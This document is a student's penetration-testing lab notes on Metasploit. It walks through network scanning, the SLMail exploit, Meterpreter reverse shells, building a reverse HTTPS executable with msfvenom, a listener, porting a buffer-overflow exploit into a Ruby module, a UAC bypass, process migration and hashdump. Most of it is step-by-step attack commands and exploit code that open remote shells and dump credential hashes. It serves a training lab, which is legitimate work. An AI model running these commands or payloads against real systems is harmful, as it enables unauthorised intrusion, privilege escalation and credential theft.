METASPLOIT FRAMEWORK ============================================================== METASPLOIT FRAMEWORK - Overview ============================================================== We have used Metasploit previously for this course in past modules, we've generated shellcode, calculated buffers, and translated assembly to OP code using utilities from this framework, so what exactly is it? As described by it's authors the metasploit framework is an advanced open sourced platform written in ruby for developing, testing and using exploit code. Metasploit can be handy in almost any phase of a penetration test, from passive and active information gathering to vulnerability research and development all the way to client side attacks and post-exploitation techniques. There are several user interfaces that we can use to operate the metsaploit framework. The most popular is the interactive console msfconsole. MSF requires several services to be running that are not enabled at boot time in Kali Linux. To start the required postgres and metasploit service dependencies we can simply start them as we would any other service. #/etc/init.d/postgresql start #/etc/init.d/metasploit start Now that everything is setup, we can start exploring the various exploits, auxiliary modules, payloads and plugins that the metasploit framework has to offer us. To start the msfconsole #msfconsole The help command can get us started with the basic options msf has to offer. msf>help ============================================================== METASPLOIT FRAMEWORK - Auxiliary modules ============================================================== The metasploit framework contains hundreds of auxiliary modules which provide various functionality such as protocol enumeration, host discovering and more. These modules all follow a common syntax usage which makes them easy to explore and use. Let's try using some of these auxiliary modules and get a feel for the syntax needed to run the metasploit framework. The "show auxiliary" command will display a long list of all the different auxiliary modules in the metasploit framework that can be used for various tasks such as information gathering, located under the 'gather' hierarchy, scnning and enumeration of various services located under the 'scanner' hierarchy, and so on. #show auxiliary ============================================================== METASPLOIT FRAMEWORK - SNMP Auxiliary modules ============================================================== I'll quickly search for snmp to get a list of all exploits and modules which contain this string. #search snmp I receive a list that includes some basic snmp discovery modules. So let's go ahead and use this module. msf>use auxiliary/scanner/snmp/snmp_enum And let's get more info about this module msf>info Now we need to figure out how to use this auxiliary module. #show options Note that some parameters are required to be entered before this module can run. In this case we want to add the RHOSTS and THREADS for faster scanning. msf>set RHOSTS 10.11.1.1-254 msf>set THREADS 10 With all required parameters set we can now run this module: msf>run The scanner has now run and has enumerated machines with the snmp protocol enabled and configured for public access. ============================================================== METASPLOIT FRAMEWORK - SMB Auxiliary modules ============================================================== Lets use the SMB version scanner msf>use auxiliary/scanner/smb/smb_version msf>show options msf>set RHOSTS 10.11.1.1-254 msf>set THREADS 10 msf>run So the SMB OS Discovery module ran and enumerated machines with open SMB ports. In the event that we want to set the input parameters such as RHOSTS to global, we can use setg instead of set. eg: msf>setg RHOSTS 10.11.1.1.-254 ============================================================== METASPLOIT FRAMEWORK - WEBDAV Auxiliary Module ============================================================== msf>use auxiliary/scanner/http/webdav_scanner msf>show options If we used the setg options the THREADS and RHOSTS will be already set. Let's run the module. msf>run This plugin has scanner our network and discovered machines with the WebDav service enabled. Taking some time to review the various auxiliary modules that the metasploit framework has to offer is a recommended exercise. ============================================================== METASPLOIT FRAMEWORK - Database Services ============================================================== If the metasploit and postgresql services are started ahead of time, the metasploit framework will log it's findings and information about discovered hosts in a convenient and accessible database. To display all discovered hosts up to this point, we can give the 'hosts' command from within msfconsole. msf>hosts To further populate this database, we can use the db_nmap metasploit wrapper to scan hosts with nmap and have the scan output inserted in to the database. msf>db_nmap 10.11.1.1.-254 --top-ports 20 Once the scan is done, we can query the database for machines with specific properties. For example we can look for all machines with port 443 open. msf>services -p 443 ============================================================= You can search for all the modules effecting a particular platform using the built-in search functionality of msfconsole. For example, use msf> search platform:"Windows XP SP3" type:exploit should find all the modules effecting Windows XP SP3. Use other regular expression variations as well such as Windows XP Service Pack 3 etc to get an idea. ============================================================== Using the database - check out the looting commands towards the end. https://www.offensive-security.com/metasploit-unleashed/using-databases/ ============================================================== METASPLOIT FRAMEWORK - Metasploit Exploits ============================================================== An example using SLMAIL exploit. In this example the payload is altered. msf>search pop3 msf>use exploit /windows/pop3/seattlelab_pass msf> set PAYLOAD windows/shell_reverse_tcp msf>show options msf>set ROST 10.11.25.139 msf>set LHOST 10.11.1.179 msf>set LPORT 443 msf> ============================================================== METASPLOIT FRAMEWORK - Metasploit Payloads ============================================================== Up to now, we have limited our payload use in metasploit to simple standard own reverse shell payloads. Let's take some time to examine some additional payloads that the metasploit framework has to offer. One of the first distinctions which are mportant to make note of is between metasploit payload is between staged and non-stage shell code. A non-staged payload is a payload that is sent in it's entirety as we have done up to this point. A staged payload is usaully sent in 2 parts. The first is a small primary payload which usually instructs the victim to connect back to the attacker and accept a larger secondary payload and then executes it. ============================================================== METASPLOIT FRAMEWORK - Meterpreter ============================================================== One of the most powerful tage payloads that the metasploit framework has to offer is the meterpreter payload. Meterpreter is a staged multifunction payload that can be dynamically extended at run time. In practise this means that the meterpreter shell provides more features and functionality than a reguler shell by having in built file uploads and downloads, keyloggers and so on. This additional functionality makes meterpreter the favourite and most commonly used payload in the metasploit framework. Let's get a taste of the meterpreter payload by swapping out our non stage reverse shell to a reverse meterpreter connection in our slmail exploit. msf>set PAYLOAD windows/meterpreter/reverse_tcp msf>show options msf>run We now have a meterpreter shell on the windows lab machine. The help command will provide a list of commands that the meterpreter paylod has to offer. meterpreter>help eg: meterpreter>sysinfo meterpreter>getuid meterpreter>search -f *pass*.txt ============================================================== METASPLOIT FRAMEWORK - Meterpreter in Action ============================================================== Meterpreter simplifies many of the post exploitation processes such as uploading and downloading files. Let's try uploading and downloading netcat to the victim machine using the meterpreter upload function. meterpreter>upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec\\Desktop In much the same way we can also download files from the victm to our attacking box. meterpreter>download c:\\Windows\\system32\calc.exe /tmp/calc.exe To directly interact with a victim machines command prompt, we can simply type the shell command. meterpreter>shell C:\> Te huge adcantage of spawning a shell from within meterpreter, is that for some reason our shell should die, we can simply spawn a new one from within the meterpreter session. Let's look at some additional payloads that the metasploit framework has to offer us. ============================================================== METASPLOIT FRAMEWORK - Additional Payloads ============================================================== Metasploit offers us a huge variety of shellcode payloads. From payloads that connect to a victim machine using VNC to payloads which tunnel themselves out of an organisation using DNS querries. getting to know these variou payloads can help us significantly during a penetration test. For example, the reverse meterpreter https payload is designed to encapsulate meterpreter communications within https requests allowing us to bypass most deep packet inspection filters. Another nice example is the reverse_tcp_allports payload which attempts to connect back to our attacking machine on all ports which is useful in situations when we are not sure what egress firewall rules are in place. ============================================================== METASPLOIT FRAMEWORK - Binary Payloads ============================================================== The metasploit framework, not only has a wide range of available payloads, but can also output these various payloads in to various filetypes and formats such as asp, vbscript, java executable, windows dlls pe binaries and more. Let's take a look at the msfveno utility and get a listing of paylaods available to us. #msfvenom -l This produces a really long list of all the different types of payloads that msfvenom can generate. Let's use msfvenom to generate a windows reverse meterpreter https pe executable. #msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.1.179 LPORT=443 -f exe --platform windows -a x86 > /var/www/html/reverse_met_https.exe Check the file is as expected: #file /var/www/html/reverse_met_https.exe Download this file now to the windows 7 lab machine. http://10.11.1.179/reverse_met_https.exe Before running the executable on the windows machine we first need to setup a listener on our attacking box. ============================================================== METASPLOIT FRAMEWORK - The Multihandler Module ============================================================== The metasploit multihandler module can accept varous payloads and handle them correctly including single and multi staged payloads. #msfconsole msf>use exploit/multi/handler msf>set PAYLOAD windows/meterpreter/reverse_https msf>show options msf>set LHOST 10.11.1.179 msf>set LPORT 443 msf>run The handler/listener is now running. Now we can run the PE on the windows machine that we created in the last module. Once executed, we have a meterpreter session: meterpreter> ============================================================== METASPLOIT FRAMEWORK - Porting Exploits to MSF ============================================================== Let's take a look at what it takes to port some of our exploits to the metasploit framework. See exercise 7.8.1.2 listener: #nc -nvlp 443 Execute the exploit: #python vulnBO-4.py 10.11.25.139 In this example, the SLMAIL exploit is ported. For the exercise, I want to do the same for my crossfire exploit. Create the required metasploit directory structure under the root directory so that we dont corrupt the metasploit CAD package. #mkdir -p ~/.msf4/modules/exploits/windows/misc Enter the directory. #cd ~/.msf4/modules/exploits/windows/misc Copy an existing SLMAIL exploit to this directory so that it can be used as a template. cp /usr/share/metasploit-framework/modules/exploits/window/pop3/seattlelab_pass.rb ./vulnsever.rb And proceed to edit the template that was just copied over. #nano vulnserver.rb Start by changing the name, description and author of the exploit. Update the space for the ShellCode - 800 bytes Update the return address to match the one that we used in our python code. - 0x65d11d71 Update the target description "Universal JMP ESP address" Update the default RPORT to 5555 Now it is time to recreate our exploit buffer within this Ruby Exploit. Remove the previous buffer setup for the slmail exploit. For reference puposes, paste the buffer taken from the python exploit. using the python buffer as a reference, recreate the buffer in ruby. Example from the video: This goes after def exploit connect My modified buffer goes here. and before sock.put(request) handler disconnect --------------------------------------- request = "AUTH" + make_nops(40) request << payload.encoded request << make_nops(1000-payload.encoded.length) request << [target.ret].pack('V') request << "\x81\xC4\x54\xF2\xFF\xFF" request << "\xe9\xf9\xfb\xff\xff" request << rand_text_alpha(400) --------------------------------------- Now we save and exit. Proceed to load it within the metasploit framework. #msfconsole msf>search vulnerserver msf>use exploit/windows/misc/vulnerserver msf>set PAYLOAD windows/meterpreter/reverse_tcp msf>set LHOST 10.11.0.179 msf>set LPORT 443 msf>set RHOST 10.11.25.139 Make sure that the vulnerable server is running on the windows machine by running the shortcut in the tools directory. msf>exploit We have a shell. ============================================ See exercise 7.8.1.2. Listener: #nc -nvlp 443 Execute the exploit #python vulnBO-4.py 10.11.25.139 ============================================ 1. Create a new directory in metasploit. 2. Create a new file in this directory and copy in the contents of the example exploit in the pdf. 3. Test using this exploit as is. 3. Adjust the values to match what it is I have in my exploit cross-poc-shell.py. 4. Test the exploit once more. This is now working and the exploit is listed as crossfireSaidshow2.rb ============================================================== METASPLOIT FRAMEWORK - Post Exploitation ============================================================== So far we have seen file uploads and downloads along with simple session management however the metasploit framework has much more to offer in this field, from privilege escalation, dumping windows hashes, running keyloggers and even taking screenshots of the victim machine. But first before we get start its crucial to get a full understanding of the privileges we have on the system especially when working with windows OS. Let's use a reverse meterpreter shell as an example. While our shell may have been run by an admin user, we may still face restrictions such as UAC or require process migration for our post exploitation modules to work. The getuid command shows that we have the privileges of the 'offsec' user. We already know that this user is an admin. meterpreter>getuid the getprivs command shows that the current shell has UAC restrictions imposed on it. meterpreter>getprivs This means if we try and run a post exploitation module such as 'hashdump', the process may fail as I do not have the correct privileges to run this module. In this case I will first need to bypass UAC. In order to bypass UAC, I need to background the current meterpreter session: meterpreter>background Now invoke a metasploit module able to bypass UAC. msf>use exploit/windows/local/bypassuac msf>set SESSION 1 msf>set PAYLOAD windows/meterpreter/reverse_tcp msf>set LHOST 10.11.0.179 msf>set LPORT 8888 (NOTE: This needs to be a port that is not already in use. Eg, a different port to the original session.) msf>run This will upload a file and execute a new reverse shell with improved privileges. See with the getprivs command that there is now a much larger set of privileges. meterpreter>getprivs Now that we have non UAC restricted admin shell, let's try hashdump once more meterpreter>hashdump This fails once more. This module needs to run with system privileges. To solve this problem we can try migrating the current meterpreter process to an existing process that is running with system privileges such as the SNMP service. List all running processes and their privilege with the ps command. meterpreter>ps Let's have meterpreter migrate to this process. meterpreter>migrate 1468 A getuid command should now show that the meterpreter process is running with system privileges. meterpreter>getprivs Hashdump now completes successfully. meterpreter>hashdump background this second system privileged shell and list all sessions that we currently have: meterpreter>background msf>sessions -l